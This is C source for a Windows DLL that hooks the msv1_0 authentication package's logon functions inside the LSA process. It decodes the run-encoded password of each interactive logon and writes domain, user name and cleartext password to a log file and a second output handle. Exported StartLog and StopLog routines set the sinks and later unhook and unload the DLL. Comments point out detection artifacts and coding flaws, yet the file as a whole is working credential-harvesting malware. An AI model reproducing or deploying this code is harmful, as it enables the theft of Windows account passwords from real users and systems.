#define WIN32_LEAN_AND_MEAN
#define UNICODE
#ifdef UNICODE
#define _UNICODE
#endif
#include <windows.h>
#include <tchar.h>
#define AH_STATIC_LINKING
#include <ApiHooks.h>
#define SECURITY_WIN32
#include <SSpi.h>
#include <NtSecApi.h>
#include <NtSecPkg.h>
#include "LogonLog.h"
/////////////////////////////////////////////////////////
// Local re-declaration of the LsaApLogonUserEx2 signature. NtSecPkg.h prototypes
// LSA_AP_LOGON_USER_EX2 without NTAPI (plain C calling convention), so a matching
// NTAPI function type is declared here for the saved original-entry-point pointer.
typedef NTSTATUS
(NTAPI xLSA_AP_LOGON_USER_EX2) (
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
);
// Saved pointers to the original msv1_0 entry points. Their addresses are handed
// to the hook engine via ApiHookChain (below), which presumably fills them in when
// the hooks are installed; StopLog releases them with LocalFree.
xLSA_AP_LOGON_USER_EX2 *OldLsaApLogonUserEx2 = NULL;
LSA_AP_LOGON_USER_EX *OldLsaApLogonUserEx = NULL;
// Unhook bookkeeping for the ApiHooks library (ADDR_CONTENTS / API_UNHOOK are its
// types, declared in ApiHooks.h and not visible here).
#define NUNHOOKS 2 //2 is enough for OVERWRITE/RAW
ADDR_CONTENTS ULA2[NUNHOOKS];
ADDR_CONTENTS ULAX[NUNHOOKS];
API_UNHOOK UnhookLsaApLogonUserEx2 = {NUNHOOKS, 0, ULA2};
API_UNHOOK UnhookLsaApLogonUserEx = {NUNHOOKS, 0, ULAX};
// Output sinks for the captured logon text: a log file and a second handle (hMS)
// that receives the same text plus its terminator. Both are set by StartLog and
// closed by StopLog; INVALID_HANDLE_VALUE disables a sink.
HANDLE hLogFile = INVALID_HANDLE_VALUE, hMS = INVALID_HANDLE_VALUE;
// ntdll!RtlRunDecodeUnicodeString, resolved at runtime in DllMain and used by
// WriteLogonInfo to undo the run-encoding of the password field in the
// authentication buffer. Stays NULL if the export cannot be resolved.
typedef VOID (NTAPI *TRtlRunDecodeUnicodeString)(BYTE, PUNICODE_STRING);
TRtlRunDecodeUnicodeString pRtlRunDecodeUnicodeString = NULL;
// Formats one logon attempt as text and writes it to the configured sinks.
// Called by both hook wrappers after the original msv1_0 entry point returned.
// AuthenticationInformation is the wrapper's private LocalAlloc copy of the
// client's authentication buffer; ownership transfers to this function, which
// LocalFree's it before returning. For an MSV1_0 interactive logon the domain,
// user name and the decoded cleartext password are written, followed by the
// LogonId (on success) and the NTSTATUS. The observable effect is cleartext
// credential material in the log file / hMS channel - for defenders, that output
// and the in-memory patch of msv1_0's logon exports are the artifacts to hunt for.
// Review notes (not changed here):
//  - Msg is a fixed stack buffer and every _stprintf is unbounded; the %.*ws
//    widths come from UNICODE_STRING lengths found in the client buffer, so the
//    total can exceed MS_MAX_MSG_SIZE (defined in LogonLog.h, not visible).
//  - Pointer relocation goes through DWORD, i.e. assumes 32-bit pointers.
//  - AuthenticationInformationLength is never compared with
//    sizeof(MSV1_0_INTERACTIVE_LOGON) before pmil's fields are read.
//  - The OUT parameters other than LogonId mirror the hooked prototype and are
//    not used.
VOID WINAPI WriteLogonInfo(
IN NTSTATUS Result,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
) {
TCHAR Msg[MS_MAX_MSG_SIZE/sizeof(TCHAR)];
PTSTR Info = Msg;
// The buffer is assumed to be an MSV1_0_INTERACTIVE_LOGON; the only check is the
// MessageType field below, and only when LogonType is Interactive.
PMSV1_0_INTERACTIVE_LOGON pmil = (PMSV1_0_INTERACTIVE_LOGON)AuthenticationInformation;
if(LogonType != Interactive)
Info += _stprintf(Info, _T("*Noninteractive logon*"));
else {
if(pmil->MessageType != MsV1_0InteractiveLogon)
Info += _stprintf(Info, _T("*NonMsV1_0InteractiveLogon*"));
else {
Info += _stprintf(Info, _T("*MsV1_0InteractiveLogon*"));
// The UNICODE_STRING.Buffer fields hold client-side addresses. They are rebased
// onto the private copy by subtracting the client-to-local delta
// (ClientAuthenticationBase - AuthenticationInformation). NULL buffers print as "".
PWSTR buf = L"";
if(pmil->LogonDomainName.Buffer)
buf = (PWSTR)((DWORD)pmil->LogonDomainName.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
Info += _stprintf(Info, _T("\r\nLogonDomainName: '%.*ws'"), pmil->LogonDomainName.Length/sizeof(WCHAR), buf);
buf = L"";
if(pmil->UserName.Buffer)
buf = (PWSTR)((DWORD)pmil->UserName.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
Info += _stprintf(Info, _T("\r\nUserName: '%.*ws'"), pmil->UserName.Length/sizeof(WCHAR), buf);
buf = L"";
if(pmil->Password.Buffer) {
// The password arrives run-encoded. This code treats the high byte of
// Password.Length as the encoding seed, masks it off, and decodes the string
// in place inside the private copy (the client's buffer is not touched).
// If RtlRunDecodeUnicodeString was not resolved the encoded bytes are logged as-is.
buf = pmil->Password.Buffer = (PWSTR)((DWORD)pmil->Password.Buffer - ((DWORD)ClientAuthenticationBase - (DWORD)AuthenticationInformation));
BYTE XorByte = HIBYTE(pmil->Password.Length);
pmil->Password.Length &= 0xFF;
if(XorByte && pRtlRunDecodeUnicodeString)
pRtlRunDecodeUnicodeString(XorByte, &pmil->Password);
}
Info += _stprintf(Info, _T("\r\nPassword: '%.*ws'"), pmil->Password.Length/sizeof(WCHAR), buf);
}
}
// NTSTATUS >= 0 covers success and informational codes; LogonId is only
// meaningful (and only dereferenced) in that case.
if((Result >= 0) && LogonId)
Info += _stprintf(Info, _T("\r\nLogonId: 0x%08X%08X"), (*LogonId).HighPart, (*LogonId).LowPart);
_stprintf(Info, _T("\r\nStatus: 0x%08X\r\n\r\n"), Result);
// i only receives the bytes-written count; WriteFile's return values are ignored.
DWORD i, MsgSize = _tcslen(Msg)*sizeof(TCHAR);
if(hLogFile != INVALID_HANDLE_VALUE)
WriteFile(hLogFile, Msg, MsgSize, &i, NULL);
// The hMS sink gets the terminating TCHAR as well.
if(hMS != INVALID_HANDLE_VALUE)
WriteFile(hMS, Msg, MsgSize+sizeof(TCHAR), &i, NULL);
// Releases the private copy. It now holds the decoded password and is not
// scrubbed before being freed, so the cleartext can persist in the host
// process heap (and Msg on the stack) until overwritten - relevant for memory
// forensics of the hosting process.
LocalFree(AuthenticationInformation);
}
// Number of hook wrappers currently executing; maintained with Interlocked
// increments/decrements and polled by StopLog before the DLL unloads itself.
LONG ThreadsIn = 0;
// Hook wrapper installed over msv1_0!LsaApLogonUserEx2 (see ApiHookChain).
// Snapshots the caller's authentication buffer, forwards the call unchanged to
// the saved original entry point, then hands the snapshot and the result to
// WriteLogonInfo. Return value and all OUT parameters are whatever the original
// produced; the logon itself is never altered or blocked.
// If the snapshot allocation fails the logon is still forwarded but not logged.
// Relies on OldLsaApLogonUserEx2 already being set by the hook engine.
NTSTATUS NTAPI NewLsaApLogonUserEx2(
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName,
OUT PSECPKG_PRIMARY_CRED PrimaryCredentials,
OUT PSECPKG_SUPPLEMENTAL_CRED_ARRAY * CachedCredentials
) {
// Mark this thread as inside a wrapper so StopLog waits for it before unloading.
InterlockedIncrement(&ThreadsIn);
// Zero-initialised private copy of the client buffer, taken before the call
// (presumably because the original may consume or alter the buffer - not
// verified here). Length is trusted as supplied by the caller.
PVOID AuthInfo = LocalAlloc(LPTR, AuthenticationInformationLength);
if(AuthInfo)
memcpy(AuthInfo, AuthenticationInformation, AuthenticationInformationLength);
NTSTATUS Result = OldLsaApLogonUserEx2(
ClientRequest,
LogonType,
AuthenticationInformation,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
PrimaryCredentials,
CachedCredentials);
// Ownership of AuthInfo passes to WriteLogonInfo, which LocalFree's it.
if(AuthInfo) {
WriteLogonInfo(
Result,
LogonType,
AuthInfo,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
PrimaryCredentials,
CachedCredentials
);
}
InterlockedDecrement(&ThreadsIn);
return(Result);
}
// Hook wrapper for the older msv1_0!LsaApLogonUserEx export, which lacks the
// PrimaryCredentials/CachedCredentials parameters. Same flow as
// NewLsaApLogonUserEx2: snapshot the authentication buffer, forward to the
// saved original, log through WriteLogonInfo (with NULL for the two missing
// parameters), and return the original's result untouched.
// If the snapshot allocation fails the logon is forwarded but not logged.
NTSTATUS NTAPI NewLsaApLogonUserEx(
IN PLSA_CLIENT_REQUEST ClientRequest,
IN SECURITY_LOGON_TYPE LogonType,
IN PVOID AuthenticationInformation,
IN PVOID ClientAuthenticationBase,
IN ULONG AuthenticationInformationLength,
OUT PVOID *ProfileBuffer,
OUT PULONG ProfileBufferLength,
OUT PLUID LogonId,
OUT PNTSTATUS SubStatus,
OUT PLSA_TOKEN_INFORMATION_TYPE TokenInformationType,
OUT PVOID *TokenInformation,
OUT PUNICODE_STRING *AccountName,
OUT PUNICODE_STRING *AuthenticatingAuthority,
OUT PUNICODE_STRING *MachineName
) {
// Mark this thread as inside a wrapper so StopLog waits for it before unloading.
InterlockedIncrement(&ThreadsIn);
// Private copy of the client buffer, taken before the call; length trusted as
// supplied by the caller.
PVOID AuthInfo = LocalAlloc(LPTR, AuthenticationInformationLength);
if(AuthInfo)
memcpy(AuthInfo, AuthenticationInformation, AuthenticationInformationLength);
NTSTATUS Result = OldLsaApLogonUserEx(
ClientRequest,
LogonType,
AuthenticationInformation,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName
);
// Ownership of AuthInfo passes to WriteLogonInfo, which LocalFree's it.
if(AuthInfo) {
WriteLogonInfo(
Result,
LogonType,
AuthInfo,
ClientAuthenticationBase,
AuthenticationInformationLength,
ProfileBuffer,
ProfileBufferLength,
LogonId,
SubStatus,
TokenInformationType,
TokenInformation,
AccountName,
AuthenticatingAuthority,
MachineName,
NULL,
NULL
);
}
InterlockedDecrement(&ThreadsIn);
return(Result);
}
// Entries in the hook table, including the HOOKS_END terminator.
#define NHOOKS 3
// Hook table consumed by the ApiHooks library; exported so the loader can find
// it. Each entry: target module, exported name, hook mode, where to store the
// original entry point, unhook bookkeeping, replacement function.
// Detection angle: an in-memory overwrite (HOOK_OVERWRITE) of these msv1_0
// exports in the process hosting msv1_0 (normally LSASS), or a foreign module
// there exporting ApiHookChain/StartLog/StopLog, is this DLL's footprint.
__EXPORT API_HOOK ApiHookChain[NHOOKS] = {
// only one of the following 2 APIs exists in msv1_0 - only one will be hooked
{"msv1_0.dll", LSA_AP_NAME_LOGON_USER_EX2, HOOK_OVERWRITE, &OldLsaApLogonUserEx2, &UnhookLsaApLogonUserEx2, NewLsaApLogonUserEx2},
{"msv1_0.dll", LSA_AP_NAME_LOGON_USER_EX , HOOK_OVERWRITE, &OldLsaApLogonUserEx , &UnhookLsaApLogonUserEx , NewLsaApLogonUserEx },
{HOOKS_END}
};
// This DLL's own module handle, recorded in DllMain and used by StopLog to
// unload the DLL from the host process.
HMODULE hDLL;
// Process-attach initialisation only: primes the statically linked ApiHooks
// library, records this module's handle for StopLog, and resolves
// ntdll!RtlRunDecodeUnicodeString (if it cannot be resolved, passwords are
// logged without decoding). Thread attach/detach and process detach are
// ignored. Always reports success.
BOOL APIENTRY DllMain(HINSTANCE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
GetDefaultRCInfo(); //init static AH ASAP!
hDLL = hModule;
HINSTANCE hntdll;
// Assignment inside the condition is intentional: only look up the export if
// ntdll is mapped (it always is, but the NULL path is still handled).
if(hntdll = GetModuleHandle(_T("ntdll.dll")))
pRtlRunDecodeUnicodeString = (TRtlRunDecodeUnicodeString)GetProcAddress(hntdll, "RtlRunDecodeUnicodeString");
}
return(TRUE);
}
// Exported control entry: installs the two output handles used by WriteLogonInfo.
// Ownership of both handles passes to this DLL (StopLog closes them). The
// assignments are plain global stores with no synchronisation against wrappers
// that may already be running. Always returns 0.
__EXPORT DWORD StartLog(HANDLE _hLogFile, HANDLE _hMS) {
hLogFile = _hLogFile;
hMS = _hMS;
return(0);
}
// Exported teardown, meant to run on its own thread: removes the hooks, waits
// for in-flight wrappers to drain, releases the saved original entry points and
// the output handles, frees the region passed as ThreadBody and finally unloads
// this DLL while exiting the calling thread. Never returns.
// Review notes (not changed here):
//  - Both wait loops poll with Sleep(127) and have no upper bound.
//  - ThreadsIn is read without an interlocked/volatile access; the opaque Sleep
//    call is what forces a fresh read each iteration.
//  - CloseHandle is called even for a sink that was never set
//    (INVALID_HANDLE_VALUE); it just fails in that case.
//  - VirtualFree's size argument is spelled NULL; 0 is what MEM_RELEASE requires.
//  - ThreadBody appears to be a VirtualAlloc'd region owned by the caller,
//    possibly the code of the very thread running this call - not verifiable here.
__EXPORT VOID StopLog(LPVOID ThreadBody) {
while(!UnhookApis(ApiHookChain, WHOLE_AH_CHAIN))
Sleep(127);
while(ThreadsIn)
Sleep(127);
// The saved originals are released with LocalFree, so the hook engine
// presumably allocates them with LocalAlloc - ownership not visible here.
if(OldLsaApLogonUserEx2)
LocalFree(OldLsaApLogonUserEx2);
if(OldLsaApLogonUserEx)
LocalFree(OldLsaApLogonUserEx);
CloseHandle(hLogFile);
CloseHandle(hMS);
VirtualFree(ThreadBody, NULL, MEM_RELEASE);
// Exit code ErrorAHTimeOut is defined outside this file.
FreeLibraryAndExitThread(hDLL, ErrorAHTimeOut);
}